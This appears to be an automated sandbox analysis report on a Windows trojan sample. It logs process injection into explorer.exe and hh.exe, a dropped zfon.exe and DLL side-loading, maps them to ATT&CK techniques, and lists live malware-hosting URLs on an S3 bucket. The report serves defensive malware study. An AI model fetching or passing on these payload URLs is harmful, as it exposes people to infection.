Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Memory written: PID: 4084 base: B70000 value: E8
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Memory written: PID: 4084 base: B30000 value: 00
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Thread register set: target process: 4780
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Memory written: C:\Windows\hh.exe base: 1E47A9F0000
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Memory written: C:\Windows\explorer.exe base: B70000
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Memory written: C:\Windows\explorer.exe base: B30000
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe Process created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe "C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe"
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Process created: C:\Windows\hh.exe C:\windows\hh.exe
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Code function: ___lc_locale_name_func,__crtGetLocaleInfoEx,6_2_00007FFBC1B5F930
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Code function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW,6_2_00007FFBC1B39B90
Source: C:\Windows\hh.exe Code function: gethostname,gethostbyname,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GetDriveTypeW,GetDiskFreeSpaceExW,GlobalMemoryStatusEx,GetNativeSystemInfo,K32GetProcessImageFileNameW,GetLogicalDriveStringsW,CoInitializeEx,CoCreateInstance,RegOpenKeyExW,GetLocaleInfoW,GetCurrentHwProfileW,RegOpenKeyExW,RegDeleteValueW,RegCreateKeyW,RegSetValueExW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,8_2_000001E47C4E6370
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Code function: ___lc_locale_name_func,__crtGetLocaleInfoEx,22_2_00007FFBAD27F930
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Code function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW,22_2_00007FFBAD259B90
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe Queries volume information: C:\Users\user\Desktop\nrGkqbCyKP.exe VolumeInformation
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Code function: 6_2_00007FF79D01DD10 GetSystemTimeAsFileTime,6_2_00007FF79D01DD10
Source: C:\Windows\hh.exe Code function: 8_2_000001E47C511F88 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,8_2_000001E47C511F88
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.11.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.11.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.11.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: explorer.exe, 0000000F.00000002.2750262921.0000000008F1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Windows Defender\MSASCui.exe
Source: Amcache.hve.11.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.11.dr Binary or memory string: MsMpEng.exe
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | 1 Replication Through Removable Media | 1 Native API | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | 2 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 Windows Service | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | 2 Input Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Windows Service | 1 Abuse Elevation Control Mechanism | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Registry Run Keys / Startup Folder | 412 Process Injection | 2 Obfuscated Files or Information | NTDS | 26 System Information Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 Scheduled Task/Job | 1 Software Packing | LSA Secrets | 1 Query Registry | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 1 Registry Run Keys / Startup Folder | 1 Timestomp | Cached Domain Credentials | 351 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 151 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Masquerading | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Modify Registry | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 151 Virtualization/Sandbox Evasion | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 412 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
[Behavior graph: ID 1577407; Sample: nrGkqbCyKP.exe; Start date: 18/12/2024; Architecture: WINDOWS; Score: 100]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| nrGkqbCyKP.exe | 24% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\MSVCP140.dll | 0% | ReversingLabs | | |
| C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\VCRUNTIME140.dll | 0% | ReversingLabs | | |
| C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\libcef | 24% | ReversingLabs | Win64.Trojan.DllHijack | |
| C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\vcruntime140_1.dll | 0% | ReversingLabs | | |
| C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe | 0% | ReversingLabs | | |
No Antivirus matches
No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://ns.adobe.co | 0% | Avira URL Cloud | safe | |
| https://anydesk17.s3.ap-east-1.amazonaws.com/aut.png | 100% | Avira URL Cloud | malware | |
| https://www.battle.net/shop/simplecheckout/navbar | 0% | Avira URL Cloud | safe | |
| https://android.notify.windows.com/iOSA4 | 0% | Avira URL Cloud | safe | |
| https://anydesk17.s3.ap-east-1.amazonaws.com/( | 0% | Avira URL Cloud | safe | |
| https://anydesk17.s3.ap-east-1.amazonaws.com/MSVCP140.dll | 0% | Avira URL Cloud | safe | |
| https://powerpoint.office.comer | 0% | Avira URL Cloud | safe | |
| https://anydesk17.s3.ap-east-1.amazonaws.com/ | 0% | Avira URL Cloud | safe | |
| https://anydesk17.s3.ap-east-1.amazonaws.com/view.png | 100% | Avira URL Cloud | malware | |
| http://n.ad8j | 0% | Avira URL Cloud | safe | |
| https://www.battle.net/shop/simplecheckout/error | 0% | Avira URL Cloud | safe | |
| https://anydesk17.s3.ap-east-1.amazonaws.comH | 0% | Avira URL Cloud | safe | |
| https://www.battle.net/shop/simplecheckout/debug-harness | 0% | Avira URL Cloud | safe | |
| https://www.battle.net/shop/simplecheckout/loadinghttps://www.battle.net/shop/simplecheckout/navbarh | 0% | Avira URL Cloud | safe | |
| http://anydesk17.s3.ap-east-1.amazonaws.com | 0% | Avira URL Cloud | safe | |
| http://s3-r-w.ap-east-1.amazonaws.comd | 0% | Avira URL Cloud | safe | |
| https://android.notify.windows.com/iOSd | 0% | Avira URL Cloud | safe | |
| https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k | 0% | Avira URL Cloud | safe | |
| http://anydesk17.s3.ap-east-1.amazonaws.comd | 0% | Avira URL Cloud | safe | |
| https://anydesk17.s3.ap-east-1.amazonaws.com/vcruntime140_1.dll | 0% | Avira URL Cloud | safe | |
| http://ns.adobe | 0% | Avira URL Cloud | safe | |
| https://anydesk17.s3.ap-east-1.amazonaws.com/VCRUNTIME140.dll | 0% | Avira URL Cloud | safe | |
| http://ns.ad | 0% | Avira URL Cloud | safe | |
| http://ns.adobeS | 0% | Avira URL Cloud | safe | |
| https://www.huya.com0 | 0% | Avira URL Cloud | safe | |
| https://anydesk17.s3.ap-east-1.amazonaws.com/zfon.exe | 0% | Avira URL Cloud | safe | |
| https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark | 0% | Avira URL Cloud | safe | |
| https://www.battle.net/shop/simplecheckout/error?error= | 0% | Avira URL Cloud | safe | |
| https://word.office.com48 | 0% | Avira URL Cloud | safe | |
| https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA | 0% | Avira URL Cloud | safe | |
| https://anydesk17.s3.ap-east-1.amazonaws.com/libcef.dll | 100% | Avira URL Cloud | malware | |
| https://www.battle.net/shop/simplecheckout/loading | 0% | Avira URL Cloud | safe | |
| https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark | 0% | Avira URL Cloud | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| s3-r-w.ap-east-1.amazonaws.com | 3.5.239.146 | true | false | | high |
| anydesk17.s3.ap-east-1.amazonaws.com | unknown | unknown | true | | unknown |
| api.msn.com | unknown | unknown | false | | high |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://anydesk17.s3.ap-east-1.amazonaws.com/aut.png | false | Avira URL Cloud: malware | unknown |
| https://anydesk17.s3.ap-east-1.amazonaws.com/view.png | false | Avira URL Cloud: malware | unknown |
| https://anydesk17.s3.ap-east-1.amazonaws.com/MSVCP140.dll | false | Avira URL Cloud: safe | unknown |
| https://anydesk17.s3.ap-east-1.amazonaws.com/vcruntime140_1.dll | false | Avira URL Cloud: safe | unknown |
| https://anydesk17.s3.ap-east-1.amazonaws.com/VCRUNTIME140.dll | false | Avira URL Cloud: safe | unknown |
| https://anydesk17.s3.ap-east-1.amazonaws.com/zfon.exe | false | Avira URL Cloud: safe | unknown |
| https://anydesk17.s3.ap-east-1.amazonaws.com/libcef.dll | false | Avira URL Cloud: malware | unknown |
        NameSourceMaliciousAntivirus DetectionReputation
                        high
                        https://excel.office.comexplorer.exe, 0000000C.00000002.2053283744.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2025979008.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2126404678.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2123908196.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.000000000906A000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#nrGkqbCyKP.exefalse
                                high
                                http://schemas.microexplorer.exe, 0000000C.00000000.2021531603.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.2046017334.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048244736.0000000007720000.00000002.00000001.00040000.00000000.sdmpfalse
                                  high
                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://wns.windows.com/EM0explorer.exe, 0000000C.00000002.2053283744.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2025979008.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://nydus.battle.net/Bnet/client/purchase/jsutilnrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003991000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.1991891496.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000000.1992853353.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drfalse
                                          high
                                          http://n.ad8jexplorer.exe, 0000000F.00000003.2065246181.0000000004B58000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://api.msn.com/v1/news/Feed/Windows?lexplorer.exe, 0000000F.00000003.2146195587.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2126404678.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2123908196.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2750262921.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.000000000906A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://anydesk17.s3.ap-east-1.amazonaws.com/(nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://s3-r-w.ap-east-1.amazonaws.comnrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.battle.net/shop/simplecheckout/errorzfon.exe, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://ns.adoexplorer.exe, 0000000F.00000003.2065246181.0000000004B64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://anydesk17.s3.ap-east-1.amazonaws.comHnrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.battle.net/shop/simplecheckout/debug-harnesszfon.exe, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.battle.net/shop/simplecheckout/loadinghttps://www.battle.net/shop/simplecheckout/navbarhnrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003991000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.1991891496.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000000.1992853353.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://s3-r-w.ap-east-1.amazonaws.comdnrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://anydesk17.s3.ap-east-1.amazonaws.comnrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.microsoft.cexplorer.exe, 0000000C.00000000.2022719564.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.0000000009237000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://anydesk17.s3.ap-east-1.amazonaws.comdnrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namenrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://android.notify.windows.com/iOSdexplorer.exe, 0000000C.00000000.2025979008.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2053283744.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://sectigo.com/CPS0nrGkqbCyKP.exefalse
                                                                  high
                                                                  https://word.office.comexplorer.exe, 0000000F.00000003.2126404678.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2123908196.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.000000000906A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
